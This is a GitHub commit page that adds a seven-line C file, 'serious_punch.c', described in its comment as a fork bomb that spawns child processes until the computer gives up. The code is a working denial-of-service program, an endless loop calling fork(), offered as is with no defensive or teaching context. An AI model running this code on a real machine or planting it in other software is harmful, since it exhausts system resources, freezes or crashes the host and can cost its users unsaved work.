A fork-bomb that creates lots of child process till the computer gives up.

This commit is contained in:
Minhas Kamal
2016-12-24 21:04:57 +06:00
committed by GitHub
parent f3e118e226
commit 96673fb5f8

7
serious_punch.c Normal file
View File

@@ -0,0 +1,7 @@
// A fork-bomb that creates lots of child process till the computer gives up. Works on Unix-like OS.
#include <unistd.h>
int main(){
while(1) fork();
}